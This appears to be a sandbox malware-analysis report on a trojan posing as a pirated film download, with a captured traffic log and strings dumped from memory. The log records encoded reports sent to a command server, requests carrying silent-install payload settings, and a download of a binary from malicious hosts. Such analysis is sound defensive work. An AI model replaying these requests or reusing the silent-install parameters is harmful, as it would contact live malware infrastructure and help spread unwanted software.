POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5998
Cache-Control: no-cache
data=4hUxCFbegoHZp34567yEl&report=Ybk79iZRZdw4WMPHwyTBrK6KHsoau9uwVsAOVy/MzQAcIXkQxSglS131JAsyvoEJNT6ZW0YJNPp0DFdPYmkehHyRGNPVt4ZhejkGjVIgHBf25unVVe9Y7O9kxVaW94sj9Y/YFRXES2DGbxEKtENa5KV xVn42Z3ufm0bn6t29AeWjaPYa4Vc MV4sO3TJ/KFZcEmFL5HOQM9SoVeBScasmPsVJftvIRU9l//Tc/ oKrHv6lAQQzKO10K5szW0c5cTObz6GlihFziTSq6Zgh0f8h9Yppf9wp2HXE7EB9zFve38MfuDXR6rhDQO/n1di43TGPWQ4HNFKHxrVMd0MnF/Vdicc24wLcq4ILBiXuO5yij58LxT7RqYKVT5hkEebv5nUd7Lebgo10MKh9/cUnCEFbnHuKVQ0thBl7TEFtbrInAj6 e3Vy6fqFRkVsp8 aKNSZEukqkDiMTW4TFJ1eypYGPLbMk3JVwOfVaeXcYS8HXCET5KeSV8xjpLksaLJyJRcnSiz6wEgCcBP3wdvITes vHhUpCn1r4IkaD5PzyKfanIy6PMFaX1IvVV2DTUd7xsN0ENELfo1XyT2LS4YiV64O1rgthy4cXwE1b6bZuHgyf9 ybjWcBEJJAQbN/UcHNemTyckhBB/0JvmDdqgyQyCQSsi1n4aScyJvjqTkntGVnzu2bHc/ OBM0I90aeaT1FalZKIr9VNaUIsvzmeZLl7iLlt Fz1bF8S4qh9SQaYCCSArBdzW2Fy8q9R/ulTQJX DyQZLOBuLPiZ1BRgZ/IJJPwyyMg28zVxUeslGvwKNkCAW8S51tR1WI75/nz12p6Xwlt8Gfm2V1Y2QyGJ53hM/4wV3NE6Nbyk9hXyR0w8PcVoZw8q5UTqll MORPm42L3oC//TacRF2jF6cSDaU JtSt9lDweTSv8c3YSEcg9SaDx2V 6E2cmQMVqJR7S6Xbx3MPEqT/hFXn5rXCVHY9VwSYPMp6mS6pXk/xNdpMSg5d14xx9IqVSH9N8brrC30q1Ek h12IF8FmIlYa tHCflb2ieTcAuEWvJflXyWOmAjnKVzErTGNydVcFoeyT ytH5ZPmiiVqgam1uRgeieBNeSDVXc/yKT/W 8qvSkvfrCpCkjEoEgSrpqwB2wPrTG77N0pr/sfbjQz/NNKmYUWVFVXZpucETPgjccl65g58y2GjmWjSj4VMfCPpGEAdHjl1CJjlvisyScESGl11ObgnXZw3 CaDeCILByaZRDQpscMWQ0yjf8/C
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:51 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..
GET /?step_id=7&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:55:13 GMT
Content-Type: text/html
Content-Length: 8398
Connection: close
Content-Disposition: attachment; filename="7.txt"
..r.0.B.Q.b.W.Y.J.U.A.m.z.C.3.x.u.r.p.E.e. .q.P.8.F.S.v.X.y./.W. .1.7.X.o.7.P.O.J.I.T.9.P.s.v.R.M.S.4.n.v.d.m.L.L.2.j.O.5.F.S.G.O.h.e.R.p.6.t.f.t.U./.T.6.P.Y.j.P.U.S.r.p.5.Y.k.B.r.M.l.0.O.y.c.F.R.X.h.g.y.h. .c.P.H.K.w.3.e./.Q.c.b.H.v.d.3.5.k.F.M.G.m.C.j.Z.g.D.X.5.D.B.h. .F.S.V.h.O.p.U.L.I. .5.Z.0.L.O.E. .8.Z.0.1.f.u.m.M.j.a.2.J.Y.4.k.y.d.B./.I.4.v.H.g.6.9.Z.Y.J.a.4.Q.E.8.5.R.D.h.e./.v.b.k.Y.Z.k.R.9.a.a.H.m.E.z.N.R.v.3.E.w.r.H.j.I.z.X.a.G.7.w.9.K.Y./.q.B.r.r.t.r.D.l.5.6.a.h.B.X.I.b.A.i.k.v.3.H.Q.W.J.m.m.l.d.O.u.f.X.r.0.1.Y.1.t.w./.1.x.s.v.S.T.Z.E.G.2.l.n.E.x. .a.V.S.R.9.W.c.q.j.B.x.A.s.x.h.i.9.B.m.N.i.8.Y.I.j.1.D.i.N.I.r.8.L.L.5.o.g.m.k.f.4.M.9.K.I.G.6.k.z.u.u.L.F.G.L.K.5.S.o.7.3.w.6.s.r.M.U.T.h.Z. .G.t.H.Y.W.X.b.G.O.z.M.X.X.J.j.l.q.S.R.T.c.x.N.C.Z.Y.M.W.j.g.n.g.D.1.H.m.o.p.I.q.F.5.4.j.u.7.R. .c.a.W.V.i.y.T.d.U.w.o.a.a.M.1.c.o.C.K.J.3.t.G.2.7.N.w.a.C.k.a.g.9.D.l.G. .c.H.x.x.X.t.Z.e.6.h.V.q.D.2.X.i.C.y.M.G.r.0.z.q./.n.R. .w.l.B.S.t.h.X.q.w.C.t.3.6.V.4.r.C.u.z.l.X.7.r.1.P.r.8.I.H.E.0.s.w.F.z.N.g.3.v.Y.X.Y.Q.q.M.o.Z.I.M.8.E.9.L.C.h.X.M.Z.W.i.Z.g.P.o.z.K.F.P.o.b.t.0.7.1.X.q.J.Q. .a.H.c.l.r.K.0.N.T.s.I.e.E. . .L.3.X.r.J.X.F.j.o.y.W.x.W.c.9.8.f.1.V.7.p.6.7.3. .S.Y.h.q.b.a.G.d.S.4.S.e.Q.V.G.A.z.w.Z.y.x.X.x.c.b.A.r.J.l.L.D.R.e.5.g.f.e.H.a.k.I.K.t.u.e.1.u.m.M.E.l.Z.5. .w.7.H.Z.M.k.o.a.9.p.C.l.7.N.y./.v.t. .I.c. .I.v.m.f.m./.Z.s.g.E.N.P.k.z.O.G.f.l.O.Y.9.H.H.w.7.E.9.4.M.n.V.C.A.T.J.i.k.Y.X.w.9.T.c.x./.m.U.u.h.I.q.L.4.9.f.i.d.k.F.Z.Y.s.4.u.n.f.k.F.M.2.3.W.M.t.8.C.1.M.a.y.9.h.P.4.G.j.k.H.C.n.g.0.n.P.t.A.w.2.q.B.p.L.3.i.6.2.
<<< skipped >>>
GET /2052/TerminusKeeper_143462550383614.ca HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: artstickerios.info
Connection: Keep-Alive
<<< skipped >>>
HEAD /2052/TerminusKeeper_143462550383614.ca HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: artstickerios.info
Connection: Keep-Alive
HTTP/1.1 100 ContinueHTTP/1.1 200 OK..Server: openresty..Date: Wed, 01 Jul 2015 04:54:03 GMT..Content-Type: application/octet-stream..Content-Length: 3439893..Last-Modified: Thu, 18 Jun 2015 08:40:11 GMT..Connection: close..ETag: "558283eb-347d15"..Accept-Ranges: bytes..
GET /?step_id=4_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:05 GMT
Content-Type: text/html
Content-Length: 8292
Connection: close
Content-Disposition: attachment; filename="4_1.txt"
..O.b.r.3.F.i.k.2.0.T.6.U.L.O.z.0.R.J.Q.D.P.l.8.c.T.j.Q.g.a.I.D.6. .Q.B.X.j.9.b.6.t.B.W.f.D.g.t.3.b.q.J.w.H.g.o.O.a.N.J.O.z.w.p.B.a.r.n.u.Y.W.c.N.n.t.c.W.c.c.o.M.O./.0.I.r.r.1.l.s.V.y.3.Y.l./.8.G.a.O.n./.h.O.e.U.9.9.2.G.B.x.V.9.f.J.s.A.e.F.e.u.W.I.H.u.h.a.a.j.J.6.T.E.f.f.G.m.A.o.j.a.t.6.q.N.T.9.1.R.8.X.y.d.L.K.N.A.k.I.I.T.A.W.W.0.X.i.Y.F.i.A.G.p.f.X.k.R.y.6.N.H.3.t. .J.O.7./.T.d.C.X.K.0.w. .q.H.o.K.h.R.A.m.m.D.t.m.J.N.o.8.K.Y.h.b.K.H.s.K.y.v.n.i.h.O.H.G.K.9.i.e.w.F.S.Z.S.p.h.X.V.T.R.t.T./.x.s.H.v.n.f.x.m.E.X.Q.m.C.W.R.S.b.o.H./.Z.i.b.O.C.w.n.V.D./.I.7.c. .A.L.H.Z.7.S.e.M. .H.P.o.N.D.W.G.F.8.d.v.e.7.v.j.u.X.V.P.x.X.l.W.e.P. .h.X.x.A.V.Y.t.u.W.2.l.F.t.s.V.V.V.6.N.x.5.4.L.G. .k.4.w.M.3.U.I.k.P. . .J.4.d.g.D.8.6.l.z.n.7.A.g.O. .l.D.I.b.B.n.3.V.S.V.l.P.8.W.N.h.c.s.j.k.1.Y.A.8.9.y.V.H.m.g.T.2. .C.O.Z.A.M.I.H.r.a.1.X.P.2.N.f.6.c.l.d.z.1.Z.6.q.a.T.k.A.P.h.x.I.y.A.0.j.S.R.B.N.S.d.I.u.u.h.m.z.x.l.d.T.d.N.0.O.o.y.i.v.W.g.s.p.6.M.4.M.h.R.Y.m.d.S.4.i.K.2.1.o.K.3.q.t. .g.z.b.N.W.8.P.z.l.l.7.6.g.1.X.D.5.p.l.6.s.7.S.x.G.f.s.x.P.p.x.H.1./.B.k.X.H.H.w.m.m.z.T.y.O.0.m.S.a. .Y.z.K.w.Z.9.q.Q.e.u.L.9.H.X.2.x.O./.A.D.g.o.4.o.N.K.1.L.W.u.r.T.W.1.C.x.z.V.O.f.K.c.c.0.H.G.o.V.7.k.P.8.8.I.h.T.c.1.b.S.8.X.C.E.b.1.X.w.K.p.G.b.U.P.o.i.D.b.t.M.s.k.a.j.v.I.h.b.a.E.h.l.n.Z.E.z.V.T.d.A.w.5.6. .5.0.W.o.I.3.L.y.v.N.A.H.O.J.q.J.W.m.f.K.e.A.I.v.k.O.a.P.Q.2.0.Z.S.y.g.B.L.7./.z.9.1.C.O.G.N.w.O.z.J.N.1.E.7.5.g.I.h.I.K.s. .l.e.N.v.c.Z.0.7.a.I.S.X.T.k.v./.q.C.m.p.S.A.9.K./.g.D.v.Y.N./.X.0.x.G.f.4.8.D.e.h.s.u.W.r.c.x.Q.D.y.O.M.p.e.s.g.S.M.l.v.M.L.D.r.V.X.
<<< skipped >>>
POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5922
Cache-Control: no-cache
data=qhcYUBOKdgCLOYSUMOhhU&report=jN8R3Ac9OgScSS1JLF/3jtm7mnRiJUrNKJKIDxUWpfEoUQ4J8kf8cQ7JkXJk5e8Zu7VSXiCoZFu4sczsdTuhwVfBO/ztm2TpmiYcyZdyHB68A6kKbaDTeq7nG3KA1chT8NE59WpFTcW VSWv66cxat2bz4JSTBSKEG1O13Uy3CQjCE4E270cbIYb7wNTEFujhenU5/29f8b5qOQM0iLpWE4ClGC2nT3izFhh Q1ZPVWxpGrk0DqrytN9P36MPdE60qpG2LvwI6Gt8KlUlTU1ZlD k4Iooprj8kBWbF18Hq7h9/iQBqCYSGoT90ZeuOrgBQQRy5zINUonT12IPTlPVj3VEZoOIc23y8iI4p75qqaKJVgw8igKCBhZ3UTcqTDepYb0Prf9rew3gLc0d0IpsAgv4Gzqif52/a0AaSy0t5DIEDnXt1CzVHl6LL7/zGy40xoIfUuIiKnc0x1I8l/WP7YyY3eQUmfSfjLWPF923lKjVy0xHNAyojCOCoZGfvSiYotCeQr5e6KnzmiKyMakKOdunwoFchcFIM23CmM3BngWK4V8 Ch5uOKqzoY6WchJlzxht1dxReAfys3pWas51wVDDQ3vAmettU/q40Ih5A8DkUiM3muL IOIRazpMBMI xNK2h2XEe6m8qi4SuXgi26KRYvg1u7OnHS4dl8k9EmujmAfx3y1cu5WiGRb Mq5EbVdja/qd0alFmAZQ812a02AE7vSptfe1iWyXi xak6FUzGAgdY2WtA84vyrI3GNVpPE28abUGOKzxGZ6bni/iTegMnQF/6aSoUcqw4 R6kIVrN9kOPXk9DNS5s47YnGWXTCKPDHugdfWp31Jsji5vggk3iKNhE6Oo2HxTztFW4vG9COhEYDJEr1PKMnZJtufsT6jnaAZ4fDJLcja04cqSXApCwYmGxUxKjFKOw4aXSekZ1XmL3 0qQPvsh3tc 3piBjm8QXIxlGiwUtk gt8QXaIou0I1JsCi5m/dUG/i6Bx5cexsOe4rcY667KsLRZeraT8jIutxpx42FYJ/U19xaGA/o0vnVnQ1N6gkc1oqXp8qhPlhagmr3WzvnNtV0hgA3SYyDm6HXN/DQ 1MT1VdkXj8cAG6tunRWsrWdif1msUwxhWWzN2SfRDWz7bpZFDkN cEbpch3epFK7wzTyCROAfMPos4EDcJn8e3AZcCYFHxKDEtn veEuFX3k/b1zIJA/iEkz RQg0qXnd7I8wd9dXv5m9J Q1NnUEsLCfrGoHedLGWxPCJAz
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:17 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..
POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5894
Cache-Control: no-cache
data=tYVyuHeBHFqO123456wKW&report=NoTw8vkdBiAq45rpniL0qPoO2bms2f/VMQsXgjfYWG82WyOr6niAS1/gNW47vU/GIOPGB0YR83uereBsdmkekOKm3j zS4ZaL9Xq Ukc3Flnh9iPw3Hnoc9kxrdamFtlX3t4fZFUaVbSb0vCnrKybw iMSqUP64rIVQsacWFiKmlDlxstGskUKlGr7lD4V1ikB7dXHkt7VJzvVnn9N53TyKKCn1B215SYOp81xkUXyaW7qHn4T61kzTS CaonJXJkaTbNnfuzZ6gX8IEkyzOh7QYwy29ARqQWaJhwuI1B5d1ZgO5pZJJIVP6qHENZqGe4lHxeLX5jnDwuTZpKzs YYl2zGF3h1gn oxWPjDFDskCsc8gFH7IcbkT51WsVFGqAcQe2aL4aL3PFpyTaDpwVjz271G7D8gfU7/LdXej61uQSREccUnXwfN7FFng4fbzPyhaqJKl/ovqs7dgMG03kLdg9W/Dxfwx2RL/DBefA2yAZp0v8rI3RCH8SYNzPg4vnMTf7v ljJR/zra3zkh3PYoVUG1FDXtvyWJePEfqc0R4qhSgMn8fY6IAOSAWvK1vRDnPNkK49rfCHQ1o6UTMH3CcfCoSv1L0ZXRhvRwRTG6L7bIehkJ4OTbrfQS1hTyQbcy400GmhXawJm2Q2ze3eGjPEoEpOBqJfhQsFbEjupeYzZKhH/yhfnd2e1W8J6W9Z5tCzPSjh4Jg6OYD77yoO7U8e8s8U6B5DQ uW5TGRIMeQzvrbjuh7ThvLw465DOPMqwi76soxpkynQHCFbDzvidt5VMjXg5aO4uKqvB jjyQGFGwvGQ0uxXJMY0J8n8 iUhtcsZ0doRpNCz88243Uh/VBYaftroiFza52tLFDBfr54fNkulUDAT4Qe1JXJgWelZD5BhTR7wOp4OHAq5zQWj W/SdLsrTOVP/Ft8fb7mXqIb5TE228DRYJ8DHs3/2RjPNLsNUYD0kmuYiqO G9Im2dRw5yv/1GVll9rm9Xqnh0YeAbBEXF5DcZWxmGOLp3KhlG XxWdqAD8rpYSqudr7tLQBPjlhk7ma6cMNT6waLUO95ieFT7mbu4YWwbOZ2c3NfCe77wyXoG7pkcSvZqJUYZsu4m2NGQE/TUGeVwkNywrVBOSYeujc49eDNjmb63CT8NilJCfy8e6RKVYNtCMFTIha37CvXNvfGp2LmtWSDW49NgxC6fLOcxzHmhfycsmJht7l3c02OB9FImM11lXd1d5pKc6mgAU7IsGG1VTdKxi/RhS8qqlhM
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:59 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..
GET /?step_id=3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:04 GMT
Content-Type: text/html
Content-Length: 8316
Connection: close
Content-Disposition: attachment; filename="3.txt"
..i.z.m.f.x.h.Q.L.t.a.C.h.g.q.W.l.h.a.u.g.C.w.7.l.V.z.L.u.e.H.U.m.X./.D.D.k.H.V.0.y.a.Z.p.H.z.c.r.X.I.M.G.r.p.a.v.r.9.f./.H.6.t.C.F.b.d.K.a.K.t.f.3.w.a.E.W.g.1.H.q.F.E.K.H.7.c.n.V.W.O./.o.Y.6.Q.j.K.j.R.n.m.5.U.e.U.k.O.Y.s.k.L.D.7.R.9.c.I.H./.6.x.z.K.Y.6.P.K.Y.U.J.l.l.I.e.M.B.U.W.Z.i.Z.H.8.X.k.0.M.z.y.g.N.v.Z.p.N.E.1.o.C.k.h.9.8.k.F.i.T.k./.Q.e.J.Z.c.c.h.N.G.d.L.K.n.7.A.T.8.n.k.Z.E.C./.g.9.a.v.H.R.B.l.t.R.M.O.s.V.d.C. .G.p.L.w.P.M.u.C.x.Y.W.6.8.T.c.o.m./.r.Y.J.e.X.r.2.3.B.a.4.8.H.n./.F.v.N.H.X.k.x.c.Z.d.W.q.9.F.A.w.w.P.D.A.Y.T.X.d.6.k.8.O.q.5. .O.g.d.M. .s.5.4.g.H.2.R.U.y.j.R.J.w.t.X.b.Q.9./.h.t.5.B.w.8.6.z.V.E.x.4.w.N.l.u.R.O./.p.f.k.k.Q.2.J.A.W.B.D.Z.E.J.R.0.S.G.P.n.L. .a.W.w.q.O.0.w.E.q.v.9./.s.2.f.P.F.B.h.C.e.2.O.U.K.X.W.E.p.I.q.5.h.m.l.3.8.P.9.7.Y.O.w.C.l.e.Z.G.S.Q.n.i.v.l.O.y.0.m.F.Q.d.H.W.I.v.Q.B.V.5.l.5./.J.v.P.C.g.y.u.N.K.p.R.7.D.Y.s.P.C.Q.1.a.u.C.L.n.B.J.T.D.M.d.W.m.Y.H.w.b.T.n.O.d.c.p.B.W.E.o.B.Q.O.A.X.S.P.7.e./.I.K.D.6.O.9.m.p.9.Z.q.S.G.f.p.r.g.K.7.f.s.K.l.O.F.m.Z.u.e. .8. .A.i.2.X.d.2.7.F.h.i.Z.E.f.N. .x.l.W.R.h.J.P.0.P.L.d.E.q.0.P.H.y.C.J.k.r.p.y.g.B.g.0.U.1.4.k.u.M.5.e.g.k.Z.b.0.S.d.W.p.t.U.r.Y.A.8.4.X.2.R.f.O.u.B.u.d.w.6.A.Y.j.n.k.m.y.S.Y.Z.d.3.K.2.M.O.a.k.3.i./.w.q.X.j.M.H.o.X.E.X.J.3.O.o.S.3.j.0.4.D.b.G.s.d.L.K.6.s.Z.j.F.g.X.2./.S.y.C.s.1.L.y.h.b.c.M.N.j.O.o.l.3.B.8.M.0.g.F.R.m.7./.3.c.s.m.Z.1.f.S.P.J.M. .A.z.0. .A.K.4.Z.n.s.I.x.4.9.0.G.y.C.Z.y.S.t.j.y. .9.F. .f.O.k.T.H.B.h.S.5.f.D.d.q.M.O.9.n.O.V.v.T.h.f.q.g.s.V.3.O.c.h.H.g.m.W.h.s.w.w.1.g.7.B.8.2.Q.c.N.y.c.v.4.f.u.L.d.u.i.q.l.U.d.w.N.E.Y.h.A.
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
rundll32.exe_1016:
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
GDI32.dll
GDI32.dll
USER32.dll
USER32.dll
IMAGEHLP.dll
IMAGEHLP.dll
rundll32.pdb
rundll32.pdb
.....eZXnnnnnnnnnnnn3
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
O3$dS7"%U9
.manifest
.manifest
5.1.2600.5512 (xpsp.080413-2105)
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
RUNDLL.EXE
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
YThere is not enough memory to run the file %s.
YThere is not enough memory to run the file %s.
Please close other windows and try again.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Error in %s
Missing entry:%s
Missing entry:%s
Error loading %s
Error loading %s